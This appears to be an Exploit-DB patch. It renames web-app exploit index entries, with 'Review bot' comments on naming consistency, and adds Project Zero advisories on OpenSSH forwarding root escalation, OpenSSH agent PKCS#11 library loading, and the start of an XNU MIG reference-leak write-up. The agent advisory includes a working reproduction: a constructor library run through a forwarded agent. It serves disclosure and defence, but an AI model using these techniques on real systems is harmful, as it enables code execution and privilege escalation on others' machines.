6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
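Review bot: 6612 drops the parameter entirely ("Pro Chat Rooms 3.0.3 - SQL Injection") while every other rename in this hunk keeps it in the 'x' Parameter form; it should read "Pro Chat Rooms 3.0.3 - 'guid' Parameter SQL Injection". The hunk is also inconsistent about what survives when the old title named both file and parameter: 6577 keeps the parameter ('id' Parameter) but 6608, 6613 and 6628 keep the file and drop the parameter (adid, id, rss). Separately, 6599 gains a version ("Real Estate Manager 1.01") with no sibling row to back it, unlike 6587 whose added 4.7 matches 6584 three rows above; confirm 1.01 against 6599.txt before committing it.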
@ -19979,7 +19981,7 @@ id,file,description,date,author,platform,type,port
7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
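Review bot: the 7123 rename removes "SQL Injection" and keeps only "Authentication Bypass", so the row no longer names the technique, and it now diverges from 7120 four rows above, which keeps the "(Authentication Bypass) SQL Injection" form. Either leave 7123 as it was or retitle it "X7 Chat 2.0.5 - SQL Injection / Authentication Bypass" and apply the same change to 7120 in the same pass.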
@ -21467,7 +21469,7 @@ id,file,description,date,author,platform,type,port
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0
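Review bot: 9452 is moved to the 'article' Parameter form, but 9453 two rows below ("Videos Broadcast Yourself 2 - (UploadID) SQL Injection") is left in the old "(param)" style within the same hunk; rename it to "'UploadID' Parameter SQL Injection" here rather than in a later pass.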
@ -22127,7 +22129,6 @@ id,file,description,date,author,platform,type,port
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
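Review bot: the deleted row 10834 ("Link Trader - (lnkid) SQL Injection", Hussin X) matches 6650 ("Link Trader - 'lnkid' Parameter SQL Injection", same author) earlier in this patch, so dropping it as a duplicate is reasonable, but the commit should also delete platforms/php/webapps/10834.txt so the CSV and the tree stay in sync; confirm that file is among the 6 changed files. The neighbouring rows 10831 to 10833 and 10836 to 10837 still use the "(type)" and "'code.php id'" styles this patch is retiring elsewhere.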
@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port
18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
18037,platforms/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
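Review bot: the 18037 rename drops "start_date Parameter", although the convention applied elsewhere in this patch keeps the parameter name ('lnkid' Parameter, 'tagname' Parameter); suggest "phpScheduleIt 1.2.10 - 'reserve.php' start_date Parameter Arbitrary Code Injection (Metasploit)". The added version 1.2.10 matches 6646, the non-Metasploit entry for the same reserve.php issue, so that part is consistent.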
@ -26842,7 +26843,7 @@ id,file,description,date,author,platform,type,port
24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
@ -27927,7 +27928,7 @@ id,file,description,date,author,platform,type,port
26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
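Review bot: Only 26023 is normalised to the quoted 'file.php' form in this hunk, while the adjacent entries 26020, 26021 and 26025 to 26027 keep the older unquoted "submit.php portnum Parameter" style. If the intent is to standardise descriptions, the neighbouring lines should be converted in the same pass so the file does not end up mixing both conventions for entries from the same product and author.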
@ -27940,10 +27941,10 @@ id,file,description,date,author,platform,type,port
26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0
26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0
26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0
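Review bot: The renames of 26039 to 26042 discard the parameter information ("Multiple Parameter", "forumid Parameter"), leaving four BMForum 3.0 entries that differ only by filename. The parameter name is what a defender searches for when matching a scanner finding or writing a WAF or log rule, so keep it in the quoted form this file already uses elsewhere, e.g. "BMForum 3.0 - 'post.php' 'forumid' Parameter Cross-Site Scripting".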
@ -28778,8 +28779,8 @@ id,file,description,date,author,platform,type,port
27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0
27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31305,8 +31306,8 @@ id,file,description,date,author,platform,type,port
30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
@ -31983,9 +31984,9 @@ id,file,description,date,author,platform,type,port
31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0
32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
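Review bot: The new descriptions for 31826 and 31827 reduce "newtem/footer/bsd01footer.php" and "newtem/header/bsd01header.php" to their basenames, while the phpSQLiteCMS entries 31823 and 31824 in the same hunk keep their "cms/includes/" path. Keeping the path is the more useful choice here: the directory distinguishes the theme template files from any other file of the same name and lets a reader locate the affected script in an installation.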
@ -32724,9 +32725,9 @@ id,file,description,date,author,platform,type,port
33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0
33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0
33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0
33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
@ -35638,7 +35639,7 @@ id,file,description,date,author,platform,type,port
37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0
37829,platforms/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0
37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
@ -36915,3 +36916,4 @@ id,file,description,date,author,platform,type,port
40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
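Review bot: The new 40961 entry gives no affected version, although the advisory body added in this commit states affected versions 2.3 to 2.5 and a fixed version of 2.4.25. Neighbouring entries such as 40942 (ntop-ng 2.5.160805) carry their version, so the description should too, e.g. "Apache mod_session_crypto < 2.4.25 - Padding Oracle", which also lets readers see at a glance that updating closes the issue.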

platforms/linux/local/40962.txt

@ -0,0 +1,26 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010
This issue affects OpenSSH if privilege separation is disabled (config option
UsePrivilegeSeparation=no). While privilege separation is enabled by default, it
is documented as a hardening option, and therefore disabling it should not
directly make a system vulnerable.
OpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation
is disabled, then on the server side, the forwarding is handled by a child of
sshd that has root privileges. For TCP server sockets, sshd explicitly checks
whether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if
so, requires the client to authenticate as root. However, for UNIX domain
sockets, no such security measures are implemented.
This means that, using "ssh -L", an attacker who is permitted to log in as a
normal user over SSH can effectively connect to non-abstract unix domain sockets
with root privileges. On systems that run systemd, this can for example be
exploited by asking systemd to add an LD_PRELOAD environment variable for all
following daemon launches and then asking it to restart cron or so. The attached
exploit demonstrates this - if it is executed on a system with systemd where
the user is allowed to ssh to his own account and where privsep is disabled, it
yields a root shell.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip
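Review bot: The write-up states the precondition (UsePrivilegeSeparation=no) but, unlike the agent advisory that follows in this commit, carries no "Fixed in" reference, so a reader cannot tell from this file which OpenSSH release closes the issue. Add the upstream fix reference next to the Proof of Concept link. For triage the text already gives the decisive check: a server is exposed only when privilege separation has been explicitly turned off, which the first paragraph notes is not the default.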


@ -0,0 +1,33 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009
The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.
This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
To reproduce the issue, first create a library that executes some command when it is loaded:
$ cat evil_lib.c
#include <stdlib.h>
__attribute__((constructor)) static void run(void) {
// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
// prevent recursion through system()
unsetenv("LD_PRELOAD");
unsetenv("LD_LIBRARY_PATH");
system("id > /tmp/test");
}
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
Connect to another machine using "ssh -A". Then, on the remote machine:
$ ssh-add -s [...]/evil_lib.so
Enter passphrase for PKCS#11: [just press enter here]
SSH_AGENT_FAILURE
Could not add card: [...]/evil_lib.so
At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:
$ cat /tmp/test
uid=1000(user) gid=1000(user) groups=[...]
Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h
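Review bot: The reproduction shows the agent reporting SSH_AGENT_FAILURE even though the library's constructor has already run (the "id > /tmp/test" result at the end), but the two preconditions a reader needs for risk assessment are spread across the first two paragraphs: the agent must be reachable, here via forwarding with "ssh -A" to a host the user does not fully trust, and it must not be locked. State both together above the reproduction steps, next to the "Fixed in" link, since the mitigations that follow from them (do not forward the agent to untrusted hosts, lock it when not in use, update to a fixed build) are what an operator reading this file wants.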


@ -1,16 +1,153 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926
IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return
kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via
IOConnectCallAsyncMethod.
mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object,
ip_reference and ip_release atomically increment and decrement the 32 bit io_references field.
If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that
they did take ownership and won't release it's reference on the port. This leads to a reference count leak.
Unlike OSObjects, ip_reference will allow the reference count to overflow, however it is still 32-bits
so without either a lot of physical memory (which you don't have on mobile or most desktops) or a real reference leak
this isn't that interesting.
See the previous bug for more in-depth discussion.
** MIG and mach message rights ownership **
This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable.
This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF.
ipc_kobject_server in ipc_kobject.c is the main dispatch routine for the kernel MIG endpoints. When userspace sends a
message the kernel will copy in the message body and also copy in all the message rights; see for example
ipc_right_copyin in ipc_right.c. This means that by the time we reach the actual callout to the MIG handler any port rights
contained in a request have had their reference count increased by one.
After the callout we reach the following code (still in ipc_kobject_server):
if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
// The server function is responsible for the contents
// of the message. The reply port right is moved
// to the reply message, and we have deallocated
// the destination port right, so we just need
// to free the kmsg.
ipc_kmsg_free(request);
} else {
// The message contents of the request are intact.
// Destroy everthing except the reply port right,
// which is needed in the reply message.
request->ikm_header->msgh_local_port = MACH_PORT_NULL;
ipc_kmsg_destroy(request);
}
If the MIG callout returns success, then it means that the method took ownership of *all* of the rights contained in the message.
If the MIG callout returns a failure code then the means the method took ownership of *none* of the rights contained in the message.
ipc_kmsg_free will only destroy the message header, so if the message had any other port rights then their reference counts won't be
decremented. ipc_kmsg_destroy on the other hand will decrement the reference counts for all the port rights in the message, even those
in port descriptors.
If we can find a MIG method which returns KERN_SUCCESS but doesn't in fact take ownership of any mach ports its passed (by for example
storing them and dropping the ref later, or using them then immediately dropping the ref or passing them to another method which takes
ownership) then this can lead to us being able to leak references.
** indirect MIG methods **
Here's the MIG request structure generated for io_service_add_notification_ool_64:
typedef struct {
mach_msg_header_t Head;
// start of the kernel processed data
mach_msg_body_t msgh_body;
mach_msg_ool_descriptor_t matching;
mach_msg_port_descriptor_t wake_port;
// end of the kernel processed data
NDR_record_t NDR;
mach_msg_type_number_t notification_typeOffset; // MiG doesn't use it
mach_msg_type_number_t notification_typeCnt;
char notification_type[128];
mach_msg_type_number_t matchingCnt;
mach_msg_type_number_t referenceCnt;
io_user_reference_t reference[8];
mach_msg_trailer_t trailer;
} Request __attribute__((unused));
This is an interesting method as its implementation actually calls another MIG handler:
static kern_return_t internal_io_service_add_notification_ool(
...
kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching );
data = CAST_DOWN(vm_offset_t, map_data);
if( KERN_SUCCESS == kr) {
// must return success after vm_map_copyout() succeeds
// and mig will copy out objects on success
*notification = 0;
*result = internal_io_service_add_notification( master_port, notification_type,
(char *) data, matchingCnt, wake_port, reference, referenceSize, client64, notification );
vm_deallocate( kernel_map, data, matchingCnt );
}
return( kr );
}
and internal_io_service_add_notification does this:
static kern_return_t internal_io_service_add_notification(
...
if( master_port != master_device_port)
return( kIOReturnNotPrivileged);
do {
